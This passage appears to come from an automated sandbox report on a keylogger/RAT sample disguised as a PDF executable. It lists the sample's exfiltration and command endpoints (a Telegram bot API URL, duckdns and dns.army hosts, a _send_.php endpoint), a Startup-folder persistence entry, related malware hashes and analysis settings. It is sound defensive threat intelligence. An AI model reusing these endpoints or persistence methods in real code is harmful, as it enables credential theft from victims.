00000008.00000002.4165113558.0000000004190000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004334000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004457000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004382000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://api.telegram.org/bot/sendMessage?chat_id=&text=PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1832407951.0000000004F32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.carterandcone.comlPDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://aborters.duckdns.org:8081PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4126496252.0000000000434000.00000040.00000400.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.fontbureau.com/designers/cabarga.htmlNPDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.founder.com.cn/cnPDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.fontbureau.com/designers/frere-user.htmlPDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://51.38.247.67:8081/_send_.php?LPDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000004.00000003.1707895013.00000236332C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.drfalse
                                                                                                                                            high
                                                                                                                                            http://anotherarmy.dns.army:8081PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4126496252.0000000000434000.00000040.00000400.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.jiyu-kobo.co.jp/PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://reallyfreegeoip.org/xml/8.46.123.189$PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000371F000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.000000000312B000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003170000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://reallyfreegeoip.orgPDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000371F000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003101000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003170000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://www.fontbureau.com/designers8PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesPDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000478F000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000471A000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048E9000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004745000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000049E2000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000430F000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004432000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.00000000041E0000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004196000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000433A000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000416B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedPDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          132.226.8.169
                                                                                                                                                          checkip.dyndns.comUnited States
                                                                                                                                                          16989UTMEMUSfalse
                                                                                                                                                          149.154.167.220
                                                                                                                                                          api.telegram.orgUnited Kingdom
                                                                                                                                                          62041TELEGRAMRUfalse
                                                                                                                                                          104.21.32.1
                                                                                                                                                          reallyfreegeoip.orgUnited States
                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                          IP
                                                                                                                                                          127.0.0.1
                                                                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                          Analysis ID:1589962
                                                                                                                                                          Start date and time:2025-01-13 12:07:11 +01:00
                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 10m 9s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:full
                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                          Number of analysed new started processes analysed:13
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Sample name:PDF-3093900299039 pdf.exe
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal100.spre.troj.adwa.spyw.evad.winEXE@13/12@3/4
                                                                                                                                                          EGA Information:
                                                                                                                                                          • Successful, ratio: 66.7%
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                          • Number of executed functions: 228
                                                                                                                                                          • Number of non-executed functions: 25
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 2.23.242.162, 52.149.20.212, 13.107.246.45
                                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 3260 because it is empty
                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7432 because it is empty
                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                          TimeTypeDescription
                                                                                                                                                          06:08:04API Interceptor5x Sleep call for process: powershell.exe modified
                                                                                                                                                          06:08:05API Interceptor3x Sleep call for process: svchost.exe modified
                                                                                                                                                          06:08:09API Interceptor7797610x Sleep call for process: PDF-3093900299039 pdf.exe modified
                                                                                                                                                          06:08:20API Interceptor7040495x Sleep call for process: audiomaximizer.exe modified
                                                                                                                                                          11:08:07AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          132.226.8.169Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                                          c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                                          MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                                          fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                                          4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                                          uVpytXGpQz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                                          H75MnQEha8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                                          7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                                          UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                                          149.154.167.220FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                            https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                6uPVRnocVS.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                  Udzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                      mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                        Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                                                                                                                          h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                            x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              reallyfreegeoip.orgFA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 104.21.80.1
                                                                                                                                                                              QUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 104.21.80.1
                                                                                                                                                                              Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 104.21.64.1
                                                                                                                                                                              Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 104.21.32.1
                                                                                                                                                                              mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 104.21.16.1
                                                                                                                                                                              aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 104.21.112.1
                                                                                                                                                                              gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 104.21.64.1
                                                                                                                                                                              ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 104.21.48.1
                                                                                                                                                                              h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 104.21.32.1
                                                                                                                                                                              x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              • 104.21.112.1
                                                                                                                                                                              api.telegram.orgFA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              6uPVRnocVS.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Udzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              checkip.dyndns.comFA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 158.101.44.242
                                                                                                                                                                              QUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 132.226.247.73
                                                                                                                                                                              Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 132.226.247.73
                                                                                                                                                                              Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 132.226.8.169
                                                                                                                                                                              nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 158.101.44.242
                                                                                                                                                                              mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 193.122.6.168
                                                                                                                                                                              aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 158.101.44.242
                                                                                                                                                                              gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 193.122.6.168
                                                                                                                                                                              ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 193.122.6.168
                                                                                                                                                                              h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 193.122.130.0
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              TELEGRAMRUFA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                              http://www.eovph.icu/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                              http://www.eghwr.icu/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                              https://telegrams-mc.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.170.96
                                                                                                                                                                              https://telegramerong.cc/app/Get hashmaliciousTelegram PhisherBrowse
                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                              https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              http://telegramerong.cc/appGet hashmaliciousTelegram PhisherBrowse
                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                              https://telegrams-mh.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.170.96
                                                                                                                                                                              UTMEMUSQUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 132.226.247.73
                                                                                                                                                                              Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 132.226.247.73
                                                                                                                                                                              Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 132.226.8.169
                                                                                                                                                                              JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 132.226.247.73
                                                                                                                                                                              c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                              • 132.226.8.169
                                                                                                                                                                              14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                              • 132.226.247.73
                                                                                                                                                                              rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 132.226.247.73
                                                                                                                                                                              wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 132.226.247.73
                                                                                                                                                                              tNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 132.226.247.73
                                                                                                                                                                              MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 132.226.8.169
                                                                                                                                                                              CLOUDFLARENETUShttps://smartbooking.ma/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                              FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 104.21.80.1
                                                                                                                                                                              https://connexion-pro.support/adobe/s/assets/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 104.21.11.138
                                                                                                                                                                              rRef6010273.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 172.67.74.152
                                                                                                                                                                              g5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 1.1.1.1
                                                                                                                                                                              http://aeromorning.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 104.26.4.102
                                                                                                                                                                              https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 104.17.25.14
                                                                                                                                                                              elitebotnet.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                              • 172.68.1.238
                                                                                                                                                                              MACHINE SPECIFICATIONS.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • 172.67.132.227
                                                                                                                                                                              Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • 104.21.13.141
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              54328bd36c14bd82ddaa0c04b25ed9adFA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 104.21.32.1
                                                                                                                                                                              QUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 104.21.32.1
                                                                                                                                                                              Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 104.21.32.1
                                                                                                                                                                              Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 104.21.32.1
                                                                                                                                                                              Loader.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 104.21.32.1
                                                                                                                                                                              mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 104.21.32.1
                                                                                                                                                                              aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 104.21.32.1
                                                                                                                                                                              gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 104.21.32.1
                                                                                                                                                                              ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 104.21.32.1
                                                                                                                                                                              h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 104.21.32.1
                                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eFA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              rRef6010273.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              invnoIL438805.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Shipping Docs Waybill No 2009 xxxx 351.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              wuknbFMdeq.exeGet hashmaliciousFunkLockerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              rCHARTERREQUEST.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              https://www.flndmy.er-xu.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              https://support.wt-nx.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              https://www.maps-s.xz-sr.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              No context
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                              Entropy (8bit):0.363788168458258
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                                                                                                                                              MD5:0E72F896C84F1457C62C0E20338FAC0D
                                                                                                                                                                              SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                                                                                                                                                              SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                                                                                                                                                              SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                              Preview:*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                              Entropy (8bit):1.3107912875994616
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvry:KooCEYhgYEL0In
                                                                                                                                                                              MD5:20B2EDC79D1A7A35723F799997A7B405
                                                                                                                                                                              SHA1:9CD198D24666D287C72F91AE7E917D4EBB2306AA
                                                                                                                                                                              SHA-256:09761723937026D1756E907F3236A88B0BAA9325BCF40CC9D762CA3A5C9AD15E
                                                                                                                                                                              SHA-512:8808B2429E3A8F368DB5E5CC03349FC6467E230CC9A5368A9FA21CFC15F4741BBBC9D8FE8BE5BADFD041E77A256C01901C115EA75E816F68EB3D2D850D131642
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xf56d84c8, page size 16384, Windows version 10.0
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                              Entropy (8bit):0.4221716916508341
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:XSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:Xazag03A2UrzJDO
                                                                                                                                                                              MD5:98E5087A28F97F1B47122272AF846B68
                                                                                                                                                                              SHA1:F38AC1D3CA8C7408129E73CD60E07C46126AD2E0
                                                                                                                                                                              SHA-256:97FC604CC83A05EE55156B12A213D258FF61C26F3A97380045BD5258269B1A4C
                                                                                                                                                                              SHA-512:00873DDA980D6381D0DEEFDB84F835D93FF52371CE951494F4480BA9CB93CB7891A2FDE19911BF3440138AEB14CF0150C1F714EA78DA431EB2EAF73588FF8EC6
                                                                                                                                                                              Malicious:false
